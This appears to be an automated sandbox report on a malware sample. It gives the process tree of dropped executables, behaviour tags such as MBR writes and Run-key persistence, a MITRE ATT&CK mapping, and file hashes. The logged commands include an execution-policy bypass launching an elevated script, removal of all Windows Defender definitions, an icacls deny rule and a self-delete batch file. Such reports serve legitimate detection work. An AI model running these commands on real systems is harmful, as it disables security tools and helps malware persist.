C:\Users\Admin\AppData\Local\Temp\51E9.exe
C:\Users\Admin\AppData\Local\Temp\51E9.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:10096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
2⤵
PID:1324

C:\Users\Admin\AppData\Local\Temp\588F.exe
C:\Users\Admin\AppData\Local\Temp\588F.exe
1⤵
- Executes dropped EXE
PID:9932

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:9920

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10056

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:9724

C:\Users\Admin\AppData\Local\Temp\6472.exe
C:\Users\Admin\AppData\Local\Temp\6472.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:10212

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\8a6bb3f0-5ad8-4062-8c4f-33cb0719bd68" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:3672

C:\Users\Admin\AppData\Local\Temp\6472.exe
"C:\Users\Admin\AppData\Local\Temp\6472.exe" --Admin IsNotAutoStart IsNotTask
2⤵
- Executes dropped EXE
PID:3688

C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe
"C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe"
3⤵
- Executes dropped EXE
PID:3908

C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe
"C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe" --Admin
4⤵
- Executes dropped EXE
PID:3868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
5⤵
PID:3588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
5⤵
PID:2908

C:\Program Files\Windows Defender\mpcmdrun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
5⤵
- Deletes Windows Defender Definitions
PID:7796

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
5⤵
PID:9192

C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin2.exe
"C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin2.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:3624

C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\5.exe
"C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\5.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 540
4⤵
- Program crash
PID:9200

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3552

C:\Users\Admin\AppData\Local\Temp\6A4C.exe
C:\Users\Admin\AppData\Local\Temp\6A4C.exe
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:3660

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3720

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3716

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3948

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1812

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Modify Registry

T1112

BITS Jobs

T1197

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Security Software Discovery

T1063

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
MD5
7124be0b78b9f4976a9f78aaeaed893a

SHA1
804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

SHA256
bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

SHA512
49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

Download Submit
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
MD5
7124be0b78b9f4976a9f78aaeaed893a

SHA1
804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

SHA256
bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

SHA512
49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

Download Submit
C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe
MD5
6103ca066cd5345ec41feaf1a0fdadaf

SHA1
938acc555933ee4887629048be4b11df76bb8de8

SHA256
b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

SHA512
a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

Download Submit
C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe
MD5
6103ca066cd5345ec41feaf1a0fdadaf

SHA1
938acc555933ee4887629048be4b11df76bb8de8

SHA256
b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

SHA512
a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
MD5
e8f9ee1acf0775666bd07aba781e96bc

SHA1
24bd2847a41293057f07d97f91fe375848aa70f3

SHA256
58ce03a252b823a3e76d8b3f7bd8b0f11d0ee879a48064f8cec6039185f637e3

SHA512
a9fc40ee024158c9c0a66b6fc298bdc2d7d67606610af66506ad7b907332aaf3dd680d342303ebc1977700266c440417d06ef752b6300b3e3e86913403c6fd9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
MD5
b0b41126565a0a6e9983b80bbeeeda52

SHA1
55de1515ae28f594d7eb30211df6aa99b2ce6bd5

SHA256
74e93fcf70e5301715d1d53cc2e2a1eb484bcad74baea28bbe648a5161e0c5a5

SHA512
0b31bc5ec69834e7e9228bf373176286c697f7ac23a541f655aa4bc50284ea643d25c3cdbd7ecf1e4e0d128c6dc06a74ad1c2480d7a8661ee4d4c7cd25ef7ffc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
MD5
bbed9102b8be0e17210f6d53b2e4cd57

SHA1
cfd9bad566fc55a176459bf9c33a53e960c8d5ca

SHA256
16ed0e4450d05f831d261236c56b57e1f83716ee151b559a5efff0149cd36bd7

SHA512
f6e688087b22ef452a2ca57f26c654576d8984b46d07f7257405b5166032d5af15e836fbcd2f0998862c0c7535fad403d1a489c7da23ff76bb9381ae74d10e80

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
e450e30af53c367304627eb25d0e0dbe

SHA1
85b326dd4f1472612c368151842c5e9b4246440a

SHA256
eff4eed08e535997858fcdc3ee00298d921cdbb487d3c84f58f70272c1084ca3

SHA512
eeb77750820dbeff0aaaa705922e0b5f1bc32a3b2184e2abfe8c745711ba0addb04a052e90dd531230a80db74aa937abf8fcaaee72eaf5b19ec1a2a7ed65c097

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
1e991e86583f88f2dbb9f674721ef22f

SHA1
e6432666d5f06907f0fc71b248b034edf61da7d2

SHA256
7b018fc3e424eb13959415570ebea4a0285c1c3bc554056b5ba750a952315e29

SHA512
8dd2396cc80e31004cf894418bece5d359b9121f3faa028be35d0670c47a932364462260d53b7c0b323388a194b78366f2654dbc995e96ea7af0a6553ff59d4e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
e5d1d4a59473d632aa1ad37d2ea46753

SHA1
b5819e9895bd6c875c38ce4192c9f6e981da1eef

SHA256
8444481c78dc1435fd2ca2d1df543d573d5e3ec3bd4258c9aa16fb9b04b30556

SHA512
43fbf507733ec40bf728f02e31cf11eccbf46a2b9fec9ce046117356306c32fa905624a275f9652b57dc79b0730188fa0ba3a99ce0f363731d4d6daaf7cf2b25

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
5e48c741e2e27509a1a34a3007f378a6

SHA1
b3bf7708c0b70b313bd0ca7251625c2f61252443

SHA256
69648206e58325ef33ade32d4ba1791e7d67a4b8205e0c6665bb4c4e342ffbce

SHA512
cf425d806337df0f82703cc2df9f1e209436ccbf91a047ab7d36b1436e13a599ca4f9259309b329dc188ee2188271d37ae9d6740a2d79d02b8c6d3339b30b29e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
e97950802d6e893f01b8ecd1f5657cba

SHA1
99f8be134bbba6b34595cf7b717372ab84909c3a

SHA256
20d5f48d69f45048127c9646759fd43566ada194f2e08aa60f71f9cf55ee7a2e

SHA512
ff6e0b2ceba7dc59b17d9c7515b8256b8e11a68a4a7f2f492b4410fe7ebfb98d3891cb98d6783322fe908a19aeb506b58d814ad3b7640e0a105e4b7be421e6d9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
3ca90879e6ba39bb199bc9705608c818

SHA1
3e5fde6a439854a6e1fcfaf0b1c1bca66ec3a9b5

SHA256
f3e651116ed01fb9b2d834acd901cb3d512caa3ce5c606508a35769a4a0af1ed

SHA512
8a0e29d3b5c574220ff0edaa77901ad699df433dff5d4b12343dc55d73516498c4eddc32274485ff00ae14f685137401ac51cc628e195b9e90078306a9191ffd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
MD5
f62a63ca1d4af4cfd43c982684541874

SHA1
503a8882761bace84d14aa9dc2fd1ec4e3c5d1e7

SHA256
f11d13982187be582e7dfb6b2dcf364c135f5c7421b16c3e954375e008eb4ac7

SHA512
5cc1f41224552eaf1971c175df6abe36577fe290c613841f0eb6aecc5e69fc70cd26da8e0dc3e1008aa5e4051d6dc905ac3c78b88ab83cdb11710de539bd075a

Download Submit
C:\Users\Admin\AppData\Local\AdvinstAnalytics\6073fee5118372253d99d22b\1.0.0\tracking.ini
MD5
b00612e9caf5944ec5a062d53131fa8c

SHA1
85b83c40321d7f8ba938b8e4b754849d305eb2fa

SHA256
eae055ba043cc0ca1523fcfcc4dad681b84382560abd1d87fea63259704197e7

SHA512
bb4d126d09b8566e7d6ed886c4cdf31e8b3f5215eaedef7cff621a8e57a3d8342d9e0828c15096498be3fd3f4a7af2672f3f35018c3e931bc351ad291f9dfccc

Download Submit
C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Cyshupaelaenu.exe
MD5
24988abf1cac1c74e9385b4bff16e8f7

SHA1
50bae2be9668aad4f3a3a7d404c731f541b12f67

SHA256
afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

SHA512
a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Cyshupaelaenu.exe
MD5
24988abf1cac1c74e9385b4bff16e8f7

SHA1
50bae2be9668aad4f3a3a7d404c731f541b12f67

SHA256
afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

SHA512
a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Cyshupaelaenu.exe.config
MD5
98d2687aec923f98c37f7cda8de0eb19

SHA1
f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

SHA256
8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

SHA512
95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

Download Submit
C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Kenessey.txt
MD5
97384261b8bbf966df16e5ad509922db

SHA1
2fc42d37fee2c81d767e09fb298b70c748940f86

SHA256
9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

SHA512
b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIA016.tmp
MD5
d07ddd437009ebb9c21882579bf2df0d

SHA1
a24a636db25ed29e5353fa5d274bf80c2ab8ad98

SHA256
c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

SHA512
8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIA5C1.tmp
MD5
5a25fb13ed470b77eefd2eb89cb62c47

SHA1
3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

SHA256
0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

SHA512
2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

Download Submit
C:\Users\Admin\AppData\Local\Temp\f6-a45da-987-7b4b7-e3d0646926e4d\Kixeshufadae.exe
MD5
3ff7832ac6c44aea5e9652a33d5050ad

SHA1
cbf63d3811674b4fb2249f84d91528f1f3f158a2

SHA256
9f025665cbd44dcc007927ff1d2b3f26b328c1dfe4892857eaf1f7de7fdf0c3b

SHA512
7e563621c1912c498f3afe93acade2765acd4f1eccb0cf5c35341a6f4a74971d41c6f94c5b9d64d6120ef4a007c6f539b5bcc96059e3b7c9ced5ec2a44ce37c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\f6-a45da-987-7b4b7-e3d0646926e4d\Kixeshufadae.exe
MD5
3ff7832ac6c44aea5e9652a33d5050ad

SHA1
cbf63d3811674b4fb2249f84d91528f1f3f158a2

SHA256
9f025665cbd44dcc007927ff1d2b3f26b328c1dfe4892857eaf1f7de7fdf0c3b

SHA512
7e563621c1912c498f3afe93acade2765acd4f1eccb0cf5c35341a6f4a74971d41c6f94c5b9d64d6120ef4a007c6f539b5bcc96059e3b7c9ced5ec2a44ce37c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\f6-a45da-987-7b4b7-e3d0646926e4d\Kixeshufadae.exe.config
MD5
98d2687aec923f98c37f7cda8de0eb19

SHA1
f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

SHA256
8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

SHA512
95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe
MD5
6e81752fb65ced20098707c0a97ee26e

SHA1
948905afef6348c4141b88db6c361ea9cfa01716

SHA256
b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

SHA512
00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe
MD5
6e81752fb65ced20098707c0a97ee26e

SHA1
948905afef6348c4141b88db6c361ea9cfa01716

SHA256
b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

SHA512
00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5GADD.tmp\ultramediaburner.tmp
MD5
4e8c7308803ce36c8c2c6759a504c908

SHA1
a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

SHA256
90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

SHA512
780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5GADD.tmp\ultramediaburner.tmp
MD5
4e8c7308803ce36c8c2c6759a504c908

SHA1
a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

SHA256
90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

SHA512
780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HACEN.tmp\Install2.tmp
MD5
45ca138d0bb665df6e4bef2add68c7bf

SHA1
12c1a48e3a02f319a3d3ca647d04442d55e09265

SHA256
3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

SHA512
cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\Ultra.exe
MD5
cc2e3f1906f2f7a7318ce8e6f0f00683

SHA1
ff26f4b8ba148ddd488dde4eadd2412d6c288580

SHA256
0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

SHA512
49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\Ultra.exe
MD5
cc2e3f1906f2f7a7318ce8e6f0f00683

SHA1
ff26f4b8ba148ddd488dde4eadd2412d6c288580

SHA256
0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

SHA512
49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe
MD5
cd5e5ff81c7acf017878b065357f3568

SHA1
096900f55df446b72f9237f80aaf090001afa2a2

SHA256
7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

SHA512
1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe
MD5
cd5e5ff81c7acf017878b065357f3568

SHA1
096900f55df446b72f9237f80aaf090001afa2a2

SHA256
7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

SHA512
1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe
MD5
fa8dd39e54418c81ef4c7f624012557c

SHA1
c3cb938cc4086c36920a4cb3aea860aed3f7e9da

SHA256
0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

SHA512
66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

Download Submit
C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe
MD5
fa8dd39e54418c81ef4c7f624012557c

SHA1
c3cb938cc4086c36920a4cb3aea860aed3f7e9da

SHA256
0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

SHA512
66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

Download Submit
C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi
MD5
ccaf3827849d948abc7b3c0874c4aa4c

SHA1
08a3b22dfd680401f02c6ae02bf0fda177d0d111

SHA256
1c6912916cc8e466888d066ab73b607ac128a3280841b433dea9473b54aac7fa

SHA512
96a893d028ed56fae530f2b24b321c1a29cd8f5a5873a32b4e62f003fb5791e5a8e66a437ff9605559f2355f81bca7c4c3bd31f02fe86e35ceb6199b77bf2296

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\I82MLWBL.txt
MD5
6c255ff832f2ccc23dc7c6a2e4d8f41a

SHA1
b3051da656df7219a675bc748c5c7e02f3c0c7e1

SHA256
a28376a0b6bc98a63462fe77f75dfc94b1d9ca8e8a81139b2a0f4d474ed198e8

SHA512
88dda8cefd7ccbf7eab4cedada8d1cc14407a6d91d6f5f5b67aa491c16b99376c672a04943106dd2c7b19668c33c7cf2643515f7b96fd2e952fac0f6fc5236e2

Download Submit
C:\Windows\Installer\MSIB666.tmp
MD5
07df9ca625c2cb953b2a7f7f699cee7c

SHA1
3225e84b51ba76eb650231c94231b70b70b997c9

SHA256
265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

SHA512
104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

Download Submit
\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
MD5
7124be0b78b9f4976a9f78aaeaed893a

SHA1
804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

SHA256
bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

SHA512
49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

Download Submit
\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
MD5
7124be0b78b9f4976a9f78aaeaed893a

SHA1
804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

SHA256
bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

SHA512
49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

Download Submit
\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
MD5
7124be0b78b9f4976a9f78aaeaed893a

SHA1
804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

SHA256
bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

SHA512
49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

Download Submit
\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
MD5
7124be0b78b9f4976a9f78aaeaed893a

SHA1
804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

SHA256
bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

SHA512
49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

Download Submit
\Users\Admin\AppData\Local\Temp\INA9F88.tmp
MD5
07df9ca625c2cb953b2a7f7f699cee7c

SHA1
3225e84b51ba76eb650231c94231b70b70b997c9

SHA256
265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

SHA512
104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

Download Submit
\Users\Admin\AppData\Local\Temp\MSIA016.tmp
MD5
d07ddd437009ebb9c21882579bf2df0d

SHA1
a24a636db25ed29e5353fa5d274bf80c2ab8ad98

SHA256
c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

SHA512
8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

Download Submit
\Users\Admin\AppData\Local\Temp\MSIA5C1.tmp
MD5
5a25fb13ed470b77eefd2eb89cb62c47

SHA1
3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

SHA256
0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

SHA512
2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

Download Submit
\Users\Admin\AppData\Local\Temp\is-5GADD.tmp\ultramediaburner.tmp
MD5
4e8c7308803ce36c8c2c6759a504c908

SHA1
